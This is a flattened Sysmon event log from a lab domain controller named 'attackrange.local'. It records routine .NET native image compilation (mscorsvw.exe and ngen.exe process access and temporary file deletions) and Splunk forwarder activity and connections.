21:01:37.822{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A131-60D3-A302-00000000CF01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019106Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:37.806{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A131-60D3-A302-00000000CF01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019105Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.806{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A131-60D3-A302-00000000CF01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019104Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:37.681{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A131-60D3-A202-00000000CF01}6304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019103Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.665{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A131-60D3-A202-00000000CF01}6304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019102Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:37.665{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A131-60D3-A202-00000000CF01}6304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019101Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.447{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18F9031C47B2BC1A7AEC124A4D24804C,SHA256=DE7AFEE0E95B026674D30C7EAB9409D82457F92E078F85913913CB522210242D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019100Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.243{4DB9351A-A129-60D3-A102-00000000CF01}4836NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\EDK0AXEBI5\System.Web.ni.dll.auxMD5=F8AD7C55BD73001D2ABBFD25A56FDF57,SHA256=3F7C57298CF04770828EB9AAF75691E752FD9B2B59E36C2C9308BB5DA3A688C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019099Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.243{4DB9351A-A129-60D3-A102-00000000CF01}4836NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\EDK0AXEBI5\System.Web.ni.dllMD5=A5967BB34924692D20292BA544BBB6CB,SHA256=E409F1536D700E1552B833EF490C9BB3FA846B0B4AF376B920034BB2F9E6ED5C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000019128Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.665{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7625E9E47EA07A5B0CA004BCAE284B8F,SHA256=E44148852265361BA7A3100DFF5338EC7485EF4C0E8E8559D4BC9A13A82CD2FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019127Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.665{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=830044ADB3561456754B8276CECA896E,SHA256=E22A5C07E167DE6C5785BC48B9FD76A7A190380CA691E414C7A9D626E553F9DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019126Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.447{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D7BE60F3E22DDE81B8A98A0C8A1B63C,SHA256=927D979FF5F1035224BDB7462D4AB7F5E6351A155B77434586B5AEC331BAB585,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019125Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.368{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A132-60D3-A702-00000000CF01}6456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019124Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:38.353{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A132-60D3-A702-00000000CF01}6456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019123Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.353{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A132-60D3-A702-00000000CF01}6456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019122Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:38.134{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A132-60D3-A602-00000000CF01}4784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019121Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.118{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A132-60D3-A602-00000000CF01}4784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019120Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:38.118{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A132-60D3-A602-00000000CF01}4784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019119Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.056{4DB9351A-A131-60D3-A502-00000000CF01}6424NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\UHSZBK3EFO\System.Web.ApplicationServices.ni.dll.auxMD5=D9CBD86D572568560F63592AC4C45C93,SHA256=7B7E84C37B8A3F6D2AA3AE51921EA5D6595579658118B997E8252C545220DDF4,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019118Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.056{4DB9351A-A131-60D3-A502-00000000CF01}6424NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\UHSZBK3EFO\System.Web.ApplicationServices.ni.dllMD5=286C07A028634A73B9FFB83E5247D444,SHA256=CAC8B2F728B72A35338483555779FD35703C7ADAA4166F45C887210275FA9059,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019117Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:38.040{4DB9351A-A131-60D3-A502-00000000CF01}6424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1918-0\System.Web.ApplicationServices.dll2021-06-23 21:01:38.040 23542300x800000000000000019130Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:39.447{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70C42807AADE63F782DBB0DD6B2BFC5C,SHA256=08029F0CD6E600EF83350CEC3029D925533C746DC7C42BB94C6B1D211921838A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019129Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:39.056{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019132Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:39.093{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61373-false10.0.1.12-8089- 23542300x800000000000000019131Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:40.478{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=024FB29C3FB4925F941012097FCFECCD,SHA256=56EEC5851366856F33317E70E36808AC26FE5151528BD90E5F25DB76724C1943,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019146Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.948{4DB9351A-A135-60D3-A902-00000000CF01}5548NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KTCVD0RH5N\System.Web.DataVisualization.Design.ni.dll.auxMD5=ECD6113E5E6E7F270445B13107E3EE5F,SHA256=2F99FE05612470C6BD9010C190AF69512CD8D2425C3D050C930BB7791E6D990E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019145Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.948{4DB9351A-A135-60D3-A902-00000000CF01}5548NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KTCVD0RH5N\System.Web.DataVisualization.Design.ni.dllMD5=2CAB8D641662E975AB8E342F7012C92E,SHA256=217C870462F687C5E4C461BB3430D043AB2B53AB3E67679F2FDE5913DA5C528A,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019144Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:41.931{4DB9351A-A135-60D3-A902-00000000CF01}5548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\15ac-0\System.Web.DataVisualization.Design.dll2021-06-23 21:01:41.931 
354300x800000000000000019143Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:40.156{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61374-false10.0.1.12-8000- 10341000x800000000000000019142Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.697{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A135-60D3-A902-00000000CF01}5548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019141Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.681{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A135-60D3-A902-00000000CF01}5548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019140Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:41.681{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A135-60D3-A902-00000000CF01}5548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019139Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.587{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A135-60D3-A802-00000000CF01}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000019138Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.572{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A135-60D3-A802-00000000CF01}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019137Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.572{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A135-60D3-A802-00000000CF01}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

